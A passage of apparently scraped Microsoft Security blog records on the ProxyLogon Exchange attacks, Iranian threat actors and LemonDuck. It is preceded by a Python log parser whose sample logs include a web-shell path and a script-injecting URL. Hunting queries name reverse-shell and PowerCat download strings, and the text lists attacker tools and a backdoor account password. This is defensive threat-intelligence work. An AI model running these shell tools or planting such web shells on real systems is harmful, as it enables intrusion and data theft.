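                  or fnmatch.fnmatchcase(cookie, "server~*/*~*"))
        if routed and not row.get("AuthenticatedUser", "").strip():
            hits.append(row)
    return hits

def oab_hits(text):
    """CVE-2021-26858: failed OAB download whose temp file lies outside OAB\\Temp."""
    marker = "Download failed and temporary file"
    hits = []
    for line in text.splitlines():
        if marker in line:
            path = line.split(marker, 1)[1].strip()  # rest of the line is the path
            if OAB_TEMP not in path.lower():         # local or UNC path elsewhere
                hits.append(path)
    return hits

# -InternalUrl/-ExternalUrl followed by a single-quoted, double-quoted or bare value
URL_ARG = re.compile(r"""-(?:Internal|External)Url\s+(?:'((?:[^']|'')*)'|"([^"]*)"|(\S+))""", re.I)

def bad_vdir_urls(text):
    """CVE-2021-27065: Set-*VirtualDirectory whose URL property is not a plain http(s) URI."""
    bad = []
    for line in text.splitlines():
        if not re.search(r"Set-\w+VirtualDirectory", line, re.I):
            continue
        for m in URL_ARG.finditer(line):
            value = next(g for g in m.groups() if g is not None)
            try:
                parsed = urlparse(value)
            except ValueError:
                bad.append(value)
                continue
            if (parsed.scheme not in ("http", "https") or not parsed.netloc
                    or "<" in value or ">" in value or any(c.isspace() for c in value)):
                bad.append(value)
    return bad

# --- constructed samples, shaped after the fields and messages named in the text ---
HTTPPROXY_LOG = """#Software: Microsoft Exchange Server
#Fields: DateTime,RequestId,AuthenticatedUser,UrlStem,AnchorMailbox,BackEndCookie,HttpStatus
DateTime,RequestId,AuthenticatedUser,UrlStem,AnchorMailbox,BackEndCookie,HttpStatus
2021-03-03T00:01:10.000Z,r1,CONTOSO\\alice,/owa/,Sid~S-1-5-21-1-2-3-1104,Server~EX01.contoso.local~1942062974,200
2021-03-03T00:02:30.000Z,r2,,/ecp/y.js,ServerInfo~EX01.contoso.local:444/autodiscover/autodiscover.xml,,200
2021-03-03T00:03:05.000Z,r3,,/owa/auth/logon.aspx,,,200
"""
OAB_LOG = """2021-03-03T00:05:00.000Z,EX01,Download failed and temporary file C:\\Program Files\\Microsoft\\Exchange Server\\V15\\ClientAccess\\OAB\\Temp\\1a2b.tmp
2021-03-03T00:06:00.000Z,EX01,Download failed and temporary file C:\\inetpub\\wwwroot\\aspnet_client\\help.aspx
"""
ECP_LOG = """2021-03-03T00:07:00.000Z,EX01,Set-OabVirtualDirectory,-Identity 'EX01\\OAB (Default Web Site)' -ExternalUrl 'https://mail.contoso.com/OAB'
2021-03-03T00:08:00.000Z,EX01,Set-OabVirtualDirectory,-Identity 'EX01\\OAB (Default Web Site)' -ExternalUrl 'http://f/<script runat=server>/* shell body */</script>'
"""

if __name__ == "__main__":
    for row in httpproxy_hits(HTTPPROXY_LOG):
        print("HttpProxy:", row["DateTime"], row["UrlStem"], row["AnchorMailbox"])
    for path in oab_hits(OAB_LOG):
        print("OABGenerator:", path)
    for url in bad_vdir_urls(ECP_LOG):
        print("ECP:", url)
```

Feed each function the text of the corresponding log files. The HttpProxy parser keys on the header row rather than column positions, because the field set differs between Exchange builds, and the OAB check deliberately treats whatever follows the documented message as the path so that both local and UNC destinations are caught.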
The IOC feed is available in both [CSV](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.csv>) and [JSON](<https://raw.githubusercontent.com/Azure/Azure-Sentinel/master/Sample%20Data/Feeds/MSTICIoCs-ExchangeServerVulnerabilitiesDisclosedMarch2021.json>) formats. This information is being shared as TLP:WHITE.\n\n### Hashes\n\nWeb shell hashes\n\n * b75f163ca9b9240bf4b37ad92bc7556b40a17e27c2b8ed5c8991385fe07d17d0\n * 097549cf7d0f76f0d99edf8b2d91c60977fd6a96e4b8c3c94b0b1733dc026d3e\n * 2b6f1ebb2208e93ade4a6424555d6a8341fd6d9f60c25e44afe11008f5c1aad1\n * 65149e036fff06026d80ac9ad4d156332822dc93142cf1a122b1841ec8de34b5\n * 511df0e2df9bfa5521b588cc4bb5f8c5a321801b803394ebc493db1ef3c78fa1\n * 4edc7770464a14f54d17f36dc9d0fe854f68b346b27b35a6f5839adf1f13f8ea\n * 811157f9c7003ba8d17b45eb3cf09bef2cecd2701cedb675274949296a6a183d\n * 1631a90eb5395c4e19c7dbcbf611bbe6444ff312eb7937e286e4637cb9e72944\n\n### Paths\n\nWe observed web shells in the following paths:\n\n * _C:\\inetpub\\wwwroot\\aspnet_client\\_\n * _C:\\inetpub\\wwwroot\\aspnet_client\\system_web\\_\n * _In Microsoft Exchange Server installation paths such as:_\n * _%PROGRAMFILES%\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\owa\\auth\\_\n * _C:\\Exchange\\FrontEnd\\HttpProxy\\owa\\auth\\_\n\nThe web shells we detected had the following file names:\n\n * _web.aspx_\n * _help.aspx_\n * _document.aspx_\n * _errorEE.aspx_\n * _errorEEE.aspx_\n * _errorEW.aspx_\n * _errorFF.aspx_\n * _healthcheck.aspx_\n * _aspnet_www.aspx_\n * _aspnet_client.aspx_\n * _xx.aspx_\n * _shell.aspx_\n * _aspnet_iisstart.aspx_\n * _one.aspx_\n\nCheck for suspicious .zip, .rar, and .7z files in _C:\\ProgramData\\_, which may indicate possible data exfiltration.\n\nCustomers should monitor these paths for LSASS dumps:\n\n * _C:\\windows\\temp\\_\n * _C:\\root\\_\n\n### Tools\n\n * 
[Procdump](<https://docs.microsoft.com/en-us/sysinternals/downloads/procdump>)\n * [Nishang](<https://github.com/samratashok/nishang>)\n * [PowerCat](<https://github.com/besimorhino/powercat>)\n\nMany of the following detections are for post-breach techniques used by HAFNIUM, so while they help detect some of the specific attacks Microsoft has observed, it remains very important to apply the recently released updates for CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.\n\n## Microsoft Defender Antivirus detections\n\nPlease note that some of these detections are generic detections and not unique to this campaign or these exploits.\n\n * Exploit:Script/Exmann.A!dha\n * Behavior:Win32/Exmann.A\n * Backdoor:ASP/SecChecker.A\n * Backdoor:JS/Webshell _(not unique)_\n * Trojan:JS/Chopper!dha _(not unique)_\n * Behavior:Win32/DumpLsass.A!attk _(not unique)_\n * Backdoor:HTML/TwoFaceVar.B _(not unique)_\n\n## Microsoft Defender for Endpoint detections\n\n * Suspicious Exchange UM process creation\n * Suspicious Exchange UM file creation\n * Possible web shell installation _(not unique)_\n * Process memory dump _(not unique)_\n\n## Azure Sentinel detections\n\n * [HAFNIUM Suspicious Exchange Request](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/W3CIISLog/HAFNIUMSuspiciousExchangeRequestPattern.yaml>)\n * [HAFNIUM UM Service writing suspicious file](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/HAFNIUMUmServiceSuspiciousFile.yaml>)\n * [HAFNIUM New UM Service Child Process](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMNewUMServiceChildProcess.yaml>)\n * [HAFNIUM Suspicious UM Service Errors](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/HAFNIUMSuspiciousIMServiceError.yaml>)\n * [HAFNIUM Suspicious File 
Downloads](<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/htttp_proxy_oab_CL/HAFNIUMSuspiciousFileDownloads.yaml>)\n\n## Advanced hunting queries\n\nTo locate possible exploitation activity related to the contents of this blog, you can run the following [advanced hunting](<https://securitycenter.windows.com/hunting>) queries via Microsoft Defender for Endpoint and Azure Sentinel:\n\n### Microsoft Defender for Endpoint advanced hunting queries\n\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub location: [https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/](<https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/>)\n\nAdditional queries and information are available via the [_Threat Analytics portal_](<https://securitycenter.windows.com/threatanalytics3/>) for Microsoft Defender customers.\n\n**UMWorkerProcess.exe in Exchange creating abnormal content**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service creating non-standard content on disk, which could indicate web shells or other malicious content, suggesting exploitation of the CVE-2021-26858 vulnerability:\n\n`DeviceFileEvents \n| where InitiatingProcessFileName == \"UMWorkerProcess.exe\" \n| where FileName != \"CacheCleanup.bin\" \n| where FileName !endswith \".txt\" \n| where FileName !endswith \".LOG\" \n| where FileName !endswith \".cfg\" \n| where FileName != \"cleanup.bin\"`\n\n**UMWorkerProcess.exe spawning**\n\nLook for Microsoft Exchange Server\u2019s Unified Messaging service spawning abnormal subprocesses, suggesting exploitation of the CVE-2021-26857 vulnerability:\n\n`DeviceProcessEvents \n| where InitiatingProcessFileName == \"UMWorkerProcess.exe\" \n| where FileName != \"wermgr.exe\" \n| where FileName != \"WerFault.exe\"`\n\nPlease note that excessive spawning of wermgr.exe and WerFault.exe could itself be an indicator of compromise, because the service crashes during failed deserialization attempts.\n\n### Azure Sentinel advanced hunting 
queries\n\nAzure Sentinel customers can find a Sentinel query containing these indicators in the Azure Sentinel Portal or at this GitHub location: <https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/>.\n\nLook for Nishang Invoke-PowerShellTcpOneLine in Windows event logging:\n\n`SecurityEvent \n| where EventID == 4688 \n| where Process has_any (\"powershell.exe\", \"PowerShell_ISE.exe\") \n| where CommandLine has \"$client = New-Object System.Net.Sockets.TCPClient\"`\n\nLook for downloads of PowerCat in cmd and PowerShell command-line logging in Windows event logs:\n\n`SecurityEvent \n| where EventID == 4688 \n| where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") \n| where CommandLine has \"https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1\"`\n\nLook for the Exchange PowerShell snap-in being loaded. This can be used to export mailbox data; subsequent command lines should be inspected to verify usage:\n\n`SecurityEvent \n| where EventID == 4688 \n| where Process has_any (\"cmd.exe\", \"powershell.exe\", \"PowerShell_ISE.exe\") \n| where isnotempty(CommandLine) \n| where CommandLine contains \"Add-PSSnapin Microsoft.Exchange.Powershell.Snapin\" \n| summarize FirstSeen = min(TimeGenerated), LastSeen = max(TimeGenerated) by Computer, Account, CommandLine`\n\nAll three queries depend on process creation auditing (event 4688) with command-line logging enabled; without that policy the CommandLine field is empty and none of them match.\n\nThe post [HAFNIUM targeting Exchange Servers with 0-day exploits](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": 
"2021-03-02T21:07:53", "type": "mssecure", "title": "HAFNIUM targeting Exchange Servers with 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:07:53", "id": "MSSECURE:28641FE2F73292EB4B26994613CC882B", "href": "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-11-19T19:09:58", "description": "Over the past year, the Microsoft Threat Intelligence Center (MSTIC) has observed a gradual evolution of the tools, techniques, and procedures employed by malicious network operators based in Iran. At [CyberWarCon 2021](<https://www.cyberwarcon.com/>), MSTIC analysts presented their analysis of these trends in Iranian nation state actor activity during a session titled \u201c_The Iranian evolution: Observed changes in Iranian malicious network operations_\u201d. This blog is intended to summarize the content of that research and the topics covered in their presentation and demonstrate MSTIC\u2019s ongoing efforts to track these actors and protect customers from the related threats.\n\nMSTIC consistently tracks threat actor activity, including the groups discussed in this blog, and works across Microsoft Security products and services to build detections into our products that improve customer protections. 
We are sharing this blog today so that others in the community can also be aware of the latest techniques we have observed being used by Iranian actors.\n\nAs with any observed nation-state actor activity, Microsoft has directly notified customers that have been targeted or compromised, providing them with the information they need to help secure their accounts. Microsoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing MSTIC to track it as a unique set of information until we reach a high confidence about the origin or identity of the actor behind the activity. Once it meets the criteria, a DEV is converted to a named actor.\n\nThree notable trends among Iranian nation-state operators have emerged:\n\n * They are increasingly utilizing ransomware to either collect funds or disrupt their targets.\n * They are more patient and persistent while engaging with their targets.\n * While Iranian operators are more patient and persistent with their social engineering campaigns, they continue to employ aggressive brute force attacks on their targets.\n\n## Ransomware\n\nSince September 2020, MSTIC has observed six Iranian threat groups deploying ransomware to achieve their strategic objectives. These ransomware deployments were launched in waves every six to eight weeks on average.\n\n\n\n_Figure 1: Timeline of ransomware attacks by Iranian threat actors_\n\nIn one observed campaign, PHOSPHORUS targeted the Fortinet FortiOS SSL VPN and unpatched on-premises Exchange Servers globally with the intent of deploying ransomware on vulnerable networks. A recent blog post by the [DFIR Report](<https://thedfirreport.com/2021/11/15/exchange-exploit-leads-to-domain-wide-ransomware/>) describes a similar intrusion in which actors leveraged vulnerabilities in on-premises Exchange Servers to compromise a victim environment and encrypt systems via BitLocker. MSTIC also attributes this activity to PHOSPHORUS. 
PHOSPHORUS operators conducted widespread scanning and ransomed targeted systems through a five-step process: Scan, Exploit, Review, Stage, Ransom.\n\n### Scan\n\nIn the early part of 2021, PHOSPHORUS actors scanned millions of IPs on the internet for Fortinet FortiOS SSL VPN appliances that were vulnerable to [CVE-2018-13379](<https://www.fortiguard.com/psirt/FG-IR-18-384>). This vulnerability allowed the attackers to collect clear-text credentials from the sessions file on vulnerable Fortinet VPN appliances. The actors collected credentials from over 900 Fortinet VPN servers in the United States, Europe, and Israel so far this year. In the last half of 2021, PHOSPHORUS shifted to scanning for unpatched on-premises Exchange Servers vulnerable to ProxyShell. (The advisory the post links, [CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, and CVE-2021-27065](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>), covers the March 2021 ProxyLogon vulnerabilities; ProxyShell is a separate Exchange vulnerability chain disclosed later in 2021.)\n\n### Exploit\n\nWhen they identified vulnerable servers, PHOSPHORUS sought to gain persistence on the target systems. In some instances, the actors downloaded a Plink runner named _MicrosoftOutLookUpdater.exe_. This file would beacon periodically to their C2 servers via SSH, allowing the actors to issue further commands. Later, the actors would download a custom implant via a Base64-encoded PowerShell command. This implant established persistence on the victim system by modifying startup registry keys and ultimately functioned as a loader to download additional tools.\n\n### Review\n\nAfter gaining persistence, PHOSPHORUS actors triaged hundreds of victims to determine which of them were suitable for actions on objectives. On select victims, operators created local administrator accounts with a username of \u201chelp\u201d and password of \u201c_AS_@1394\u201d via the commands below. 
On occasion, actors dumped LSASS to acquire credentials to be used later for lateral movement.\n\n\n\n### Stage and Ransom\n\nFinally, MSTIC observed PHOSPHORUS employing BitLocker to encrypt data and ransom victims at several targeted organizations. BitLocker is a full volume encryption feature meant to be used for legitimate purposes. After compromising the initial server (through vulnerable VPN or Exchange Server), the actors moved laterally to a different system on the victim network to gain access to higher value resources. From there, they deployed a script to encrypt the drives on multiple systems. Victims were instructed to reach out to a specific Telegram page to pay for the decryption key.\n\n\n\n## Patience and persistence\n\nMSTIC has observed PHOSPHORUS threat actors employing social engineering to build rapport with their victims before targeting them. These operations likely required significant investment in the operator\u2019s time and resources to refine and execute. This trend indicates PHOSPHORUS is either moving away from or expanding on their past tactics of sending unsolicited links and attachments in spear-phishing email campaigns to attempt credential theft.\n\n### PHOSPHORUS \u2013 Patient and persistent\n\nPHOSPHORUS sends \u201cinterview requests\u201d to target individuals through emails that contain tracking links to confirm whether the user has opened the file. Once a response is received from the target user, PHOSPHORUS attackers send a link to a benign list of interview questions hosted on a cloud service provider. The attackers continue with several back-and-forth conversations discussing the questions with the target user before finally sending a meeting invite with a link masquerading as a Google Meeting.\n\nOnce the meeting invite is sent, the attackers continuously reach out to the target user, asking them to test the Google Meeting link. 
The attackers contact the targeted user multiple times per day, continuously pestering them to click the link. The attackers even go so far as to offer to call the target user to walk them through clicking the link. The attackers are more than willing to troubleshoot any issues the user has signing into the fake Google Meeting link, which leads to a credential harvesting page.\n\nMSTIC has observed PHOSPHORUS operators become very aggressive in their emails after the initial lure is sent, to the point where they are almost demanding a response from the targeted user.\n\n### CURIUM \u2013 In it for the long run\n\nCURIUM is another Iranian threat actor group that has shown a great deal of patience when targeting users. Instead of phishing emails, CURIUM actors leverage a network of fictitious social media accounts to build trust with targets and deliver malware.\n\nThese attackers have followed this playbook:\n\n * Masquerade as an attractive woman on social media\n * Establish a connection with a target user via LinkedIn, Facebook, etc.\n * Chat with the target daily\n * Send benign videos of the woman to the target to prime them to lower their guard\n * Send malicious files to the target similar to the benign files previously sent\n * Request that the target user open the malicious document\n * Exfiltrate data from the victim machine\n\nThe process above can take multiple months from the initial connection to the delivery of the malicious document. The attackers build a relationship with target users over time by having constant and continuous communications, which allows them to build trust and confidence with the target. 
In many of the cases we have observed, the targets genuinely believed that they were making a human connection and not interacting with a threat actor operating from Iran.\n\nBy exercising patience, building relationships, and pestering targets continuously once a relationship has been formed, Iranian threat actors have had more success in compromising their targets.\n\n## Brute force\n\nIn 2021, MSTIC observed DEV-0343 aggressively targeting Office 365 tenants via an ongoing campaign of password spray attacks. DEV-0343 is a threat actor MSTIC assesses to be likely operating in support of Iranian interests. MSTIC has [blogged about DEV-0343 activity previously](<https://www.microsoft.com/security/blog/2021/10/11/iran-linked-dev-0343-targeting-defense-gis-and-maritime-sectors/>).\n\nAnalysis of Office 365 logs suggests that DEV-0343 is using a red team tool like [o365spray](<https://github.com/0xZDH/o365spray>) to conduct these attacks.\n\nTargeting in this DEV-0343 activity has been observed across defense companies that support United States, European Union, and Israeli government partners producing military-grade radars, drone technology, satellite systems, and emergency response communication systems. Further activity has targeted customers in geographic information systems (GIS), spatial analytics, regional ports of entry in the Persian Gulf, and several maritime and cargo transportation companies with a business focus in the Middle East.\n\nAs we discussed in our previous blog, DEV-0343 operators\u2019 \u2018pattern of life\u2019 is consistent with the working schedule of actors based in Iran. DEV-0343 operator activity peaked Sunday through Thursday between 04:00:00 and 16:00:00 UTC.\n\n\n\n_Figure 2: DEV-0343 observed operating hours in UTC_\n\n\n\n_Figure 3: DEV-0343 observed actor requests per day_\n\nKnown DEV-0343 operators have also been observed targeting the same account on the same tenant being targeted by other known Iranian operators. 
For example, EUROPIUM operators attempted to access a specific account on June 12, 2021 and ultimately gained access to this account on June 13, 2021. DEV-0343 was then observed targeting this same account within minutes of EUROPIUM operators gaining access to it the same day. MSTIC assesses that these observed overlapping activities suggest a coordination between different Iranian actors pursuing common objectives.\n\n## Closing thoughts: Increasingly capable threat actors\n\nAs Iranian operators have adapted both their strategic goals and tradecraft, over time they have evolved into more competent threat actors capable of conducting a full spectrum of operations including:\n\n * Information operations\n * Disruption and destruction\n * Support to physical operations\n\nSpecifically, Iranian operators have proven themselves to be both willing and able to:\n\n * Deploy ransomware\n * Deploy disk wipers\n * Deploy mobile malware\n * Conduct phishing attacks\n * Conduct password spray attacks\n * Conduct mass exploitation attacks\n * Conduct supply chain attacks\n * Cloak C2 communications behind legitimate cloud services\n\nMSTIC thanks CyberWarCon 2021 for the opportunity to present this research to the broader security community. 
Microsoft will continue to monitor all this activity by Iranian actors and implement protections for our customers.\n\n \n\nThe post [Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021](<https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-11-16T16:00:08", "type": "mssecure", "title": "Evolving trends in Iranian threat actor activity \u2013 MSTIC presentation at CyberWarCon 2021", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-11-16T16:00:08", "id": "MSSECURE:C0F4687B18D53FB9596AD4FDF77092D8", "href": "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2021-03-19T21:46:45", "description": "As cybercriminals continue to exploit unpatched on-premises versions of Exchange Server 2013, 2016, and 2019, we continue to actively work with customers and partners to help them secure their environments and respond to associated threats. To date, we have [released a comprehensive Security Update](<https://techcommunity.microsoft.com/t5/exchange-team-blog/released-march-2021-exchange-server-security-updates/ba-p/2175901>), a one-click interim [Exchange On-Premises Mitigation Tool](<https://aka.ms/eomtrelease>) for both current and out-of-support versions of on-premises Exchange Servers, and [step-by-step guidance](<https://aka.ms/exchange-customer-guidance>) to help address these attacks.\n\nToday, we have taken an additional step to further support our customers who are still vulnerable and have not yet implemented the complete security update. With the latest security intelligence update, Microsoft Defender Antivirus and System Center Endpoint Protection will **automatically mitigate** CVE-2021-26855 on any vulnerable Exchange Server on which it is deployed. Customers do not need to take action beyond ensuring they have installed the latest security intelligence update (build **1.333.747.0** or newer), if they do not already have automatic updates turned on.\n\n\n\nThe Exchange security update is still the most comprehensive way to protect your servers from these attacks and others fixed in earlier releases. This interim mitigation is designed to help protect customers while they take the time to implement the latest Exchange Cumulative Update for their version of Exchange.\n\nMicrosoft will provide guidance to our security partners so that they have the option to make available similar, simple mitigations in their products as well.\n\nWe are deeply committed to protecting our customers. 
To stay up to date please continue to review the content posted at <https://aka.ms/exchangevulns>.\n\n### Frequently Asked Questions\n\n**Q: If I have Microsoft Defender Antivirus installed on my Exchange Server do I need to take any further action to get this mitigation?**\n\nA: Customers that install Microsoft Defender Antivirus and have automatic definition updates enabled (default setting) do not have to take further action to receive the mitigation.\n\n**Q: My organization manages Microsoft Defender Antivirus definition updates. What do I need to do to ensure I have this mitigation?**\n\nA: Customers that manage Microsoft Defender Antivirus definition updates need to select the new detection build (**1.333.747.0 or newer**) and deploy that to the Exchange Server.\n\n**Q: After this mitigation, do I still need to install the security update?**\n\nA: Yes. This automatic mitigation breaks the attack chain by mitigating CVE-2021-26855. Customers should still prioritize getting current on security updates for Exchange Server to comprehensively address the vulnerabilities.\n\n**Q: When does Microsoft Defender Antivirus apply the mitigation?**\n\nA: Microsoft Defender Antivirus will automatically identify if a vulnerable version of Exchange Server is installed and apply the mitigations the first time the security intelligence update is deployed. The mitigation is deployed once per machine.\n\n**Q: Is cloud protection required to receive the mitigation?**\n\nA: No. However, enabling cloud protection is a best practice that will keep you on the most current protections against the ever-changing threat environment. 
Customers are encouraged to enable cloud protection.\n\n**Q: What can I do if I don\u2019t have Microsoft Defender Antivirus?**\n\nA: Use the One-Click Microsoft Exchange On-Premises Mitigation Tool found [here](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>).\n\nThe post [Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus](<https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/>) appeared first on [Microsoft Security.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-18T22:00:47", "type": "mssecure", "title": "Automatic on-premises Exchange Server mitigation now in Microsoft Defender Antivirus", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855"], "modified": "2021-03-18T22:00:47", "id": "MSSECURE:FC03200E57A46D16A8CD1A5A0E647BB3", "href": "https://www.microsoft.com/security/blog/2021/03/18/automatic-on-premises-exchange-server-mitigation-now-in-microsoft-defender-antivirus/", "cvss": 
{"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-13T21:11:26", "description": "_[Note: In this two-part blog series, we expose a modern malware infrastructure and provide guidance for protecting against the wide range of threats it enables. [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) covered the evolution of the threat, how it spreads, and how it impacts organizations. Part 2 provides a deep dive on the attacker behavior and outlines investigation guidance.] _\n\nLemonDuck is an actively updated and robust malware primarily known for its botnet and cryptocurrency mining objectives. As we discussed in [Part 1](<https://www.microsoft.com/security/blog/2021/07/22/when-coin-miners-evolve-part-1-exposing-lemonduck-and-lemoncat-modern-mining-malware-infrastructure/>) of this blog series, in recent months LemonDuck adopted more sophisticated behavior and escalated its operations. Today, beyond using resources for its traditional bot and mining activities, LemonDuck steals credentials, removes security controls, spreads via emails, moves laterally, and ultimately drops more tools for human-operated activity.\n\nLemonDuck spreads in a variety of ways, but the two main methods are (1) compromises that are either edge-initiated or facilitated by bot implants moving laterally within an organization, or (2) bot-initiated email campaigns. After installation, LemonDuck can generally be identified by a predictable series of automated activities, followed by beacon check-in and monetization behaviors, and then, in some environments, human-operated actions.\n\nIn this blog post, we share our in-depth technical analysis of the malicious actions that follow a LemonDuck infection. These include general and automatic behavior, as well as human-operated actions. 
We also provide guidance for investigating LemonDuck attacks, as well as mitigation recommendations for strengthening defenses against these attacks.\n\n\n\n_Figure 2. LemonDuck attack chain from the Duck and Cat infrastructures_\n\n## External or human-initialized behavior\n\nLemonDuck activity initiated from external applications \u2013 as opposed to self-spreading methods like malicious phishing mail \u2013 is generally much more likely to begin with or lead to human-operated activity. These activities always result in more invasive secondary malware being delivered in tandem with persistent access being maintained through backdoors. These human-operated activities result in greater impact than standard infections.\n\nIn March and April 2021, various vulnerabilities related to the [ProxyLogon](<https://security.microsoft.com/threatanalytics3/4ef1fbc5-5659-4d9b-b32e-97a694475955/overview>) set of Microsoft Exchange Server exploits were utilized by LemonDuck to install web shells and gain access to outdated systems. Attackers then used this access to launch additional attacks while also deploying automatic LemonDuck components and malware.\n\nIn some cases, the LemonDuck attackers used renamed copies of the official Microsoft Exchange On-Premises Mitigation Tool to remediate the vulnerability they had used to gain access. They did so while maintaining full access to compromised devices and limiting other actors from abusing the same Exchange vulnerabilities.\n\nThis self-patching behavior is in keeping with the attackers\u2019 general desire to remove competing malware and risks from the device. 
This allows them to limit visibility of the attack to SOC analysts within an organization who might be prioritizing unpatched devices for investigation, or who would overlook devices that do not have a high volume of malware present.\n\nThe LemonDuck operators also make use of many [fileless malware techniques](<https://www.microsoft.com/security/blog/2018/01/24/now-you-see-me-exposing-fileless-malware/#:~:text=%20These%20techniques%20include%3A%20%201%20Reflective%20DLL,provide%20powerful%20means%20for%20delivering%20memory-only...%20More%20>), which can make remediation more difficult. Fileless techniques, which include persistence via registry, scheduled tasks, WMI, and startup folder, remove the need for stable malware presence in the filesystem. These techniques also include utilizing process injection and in-memory execution, which can make removal non-trivial. It is therefore imperative that organizations that were vulnerable in the past also take action to investigate exactly how patching occurred, and whether malicious activity persists.\n\nOn the basic side of implementation this can mean registry, scheduled task, WMI and startup folder persistence to remove the necessity for stable malware presence in the filesystem. However, many free or easily available RATs and Trojans are now routinely utilizing process injection and in-memory execution to circumvent easy removal. To counter these kinds of behaviors, 